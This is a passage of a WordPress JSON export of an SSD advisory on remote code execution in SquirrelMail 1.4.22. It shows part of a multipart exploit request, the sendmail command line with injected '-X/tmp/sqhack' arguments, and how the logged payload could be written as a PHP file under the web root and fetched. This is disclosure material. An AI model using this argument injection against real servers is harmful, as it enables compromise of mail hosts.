class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-57\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;MAX_FILE_SIZE&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-58\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-59\"><span class=\"crayon-cn\">2097152<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-60\"><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-61\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;attachfile&quot;<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-62\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">octet<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">stream<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-63\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-64\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-65\"><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-66\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;username&quot;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-67\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-68\"><span class=\"crayon-v\">hacker<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-69\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-70\"><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-71\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;smaction&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-72\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-73\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-74\"><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-75\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span 
class=\"crayon-s\">&#8220;mailbox&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-76\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-77\"><span class=\"crayon-v\">INBOX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-78\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-79\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;composesession&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-80\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-81\"><span class=\"crayon-cn\">4<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-82\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span 
class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-83\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;querystring&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-84\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-85\"><span class=\"crayon-v\">mailbox<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">amp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">startMessage<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-86\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span 
class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><span class=\"crayon-o\">&#8212;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0232 seconds] -->  <\/p>\n<p>The request should run the following <em>sendmail<\/em> command process:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58ffcba740c0a617485554\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> www-data 20800  0.0  1.2  83392  6252 ?        S    11:37   0:00 \/usr\/sbin\/sendmail -i -t -froot -X\/tmp\/sqhack -oQ\/tmp null@trusty<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c0a617485554-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c0a617485554-1\"><span class=\"crayon-v\">www<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-i\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">20800<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">0.0<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">1.2<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">83392<\/span><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">6252<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">S<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-cn\">11<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">37<\/span><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">usr<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sbin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sendmail<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">t<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">froot<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tmp<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sqhack<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">oQ<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">tmp <\/span><span class=\"crayon-t\">null<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">trusty<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>After the command has completed, the log containing the payload can be found in <em>\/tmp\/sqhack<\/em>.<\/p>\n<p>If file permissions have been set incorrectly within the SquirrelMail web document root, or within that of any other web application installed on the target server, the attacker could write the payload to a file like 
<em>\/var\/www\/sqhack.php<\/em> and retrieve it by:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58ffcba740c0e886160924\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/victim-site\/sqhack.php<\/textarea><\/div>\n<div 
class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c0e886160924-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c0e886160924-1\"><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/victim-site\/sqhack.php<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0004 seconds] -->  <\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3178\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Tue, 25 Apr 2017 05:24:06 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes Remote Code Execution found in SquirrelMail version 1.4.22. SquirrelMail is a standards-based webmail package written in PHP. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. 
It has very &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3178\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 SquirrelMail Remote Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757],"class_list":["post-7446","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7446","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7446"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7446\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7446"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7446"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7446"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}